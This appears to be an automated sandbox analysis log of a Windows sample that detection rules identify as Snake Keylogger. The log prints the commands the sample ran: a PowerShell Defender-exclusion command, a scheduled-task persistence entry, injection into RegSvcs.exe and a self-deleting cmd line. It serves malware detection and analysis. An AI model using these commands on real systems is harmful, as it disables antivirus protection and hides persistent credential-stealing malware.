Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F8BBD2	13_2_00F8BBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F8BEB2	13_2_00F8BEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F8B4F2	13_2_00F8B4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00F83572	13_2_00F83572

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.2233016900.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
Source: file.exe, 00000000.00000000.2177771184.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUzYE.exe" vs file.exe
Source: file.exe, 00000000.00000002.2227163955.000000000140E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.2230833137.0000000003421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
Source: file.exe, 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
Source: file.exe, 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000000.00000002.2234245075.00000000092A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameUzYE.exe" vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.djqdPdQRO.exe.38303f8.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.file.exe.452f3f0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.djqdPdQRO.exe.380f7d8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.file.exe.450e7d0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.djqdPdQRO.exe.380f7d8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.file.exe.452f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.file.exe.450e7d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 3852, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: djqdPdQRO.exe PID: 6628, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: djqdPdQRO.exe PID: 6628, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: djqdPdQRO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.file.exe.450e7d0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.450e7d0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.450e7d0.1.raw.unpack, U--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.450e7d0.1.raw.unpack, U--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.452f3f0.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.452f3f0.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.452f3f0.2.raw.unpack, U--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.452f3f0.2.raw.unpack, U--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, U--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.djqdPdQRO.exe.38303f8.3.raw.unpack, U--.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.file.exe.46088a8.0.raw.unpack, gABJl64gxsjm8OdgN8.cs	Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.46088a8.0.raw.unpack, gABJl64gxsjm8OdgN8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.46088a8.0.raw.unpack, gABJl64gxsjm8OdgN8.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.file.exe.46088a8.0.raw.unpack, Q9Q3O3v9UFqGC0o5Zy.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.46088a8.0.raw.unpack, Q9Q3O3v9UFqGC0o5Zy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.92a0000.4.raw.unpack, gABJl64gxsjm8OdgN8.cs	Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.92a0000.4.raw.unpack, gABJl64gxsjm8OdgN8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.92a0000.4.raw.unpack, gABJl64gxsjm8OdgN8.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.file.exe.92a0000.4.raw.unpack, Q9Q3O3v9UFqGC0o5Zy.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.92a0000.4.raw.unpack, Q9Q3O3v9UFqGC0o5Zy.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@28/12@2/2

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\djqdPdQRO.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Mutant created: \Sessions\1\BaseNamedObjects\TPxqCxtCTaIBoi
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\tmp8017.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\djqdPdQRO.exe C:\Users\user\AppData\Roaming\djqdPdQRO.exe
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp93EE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp93EE.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
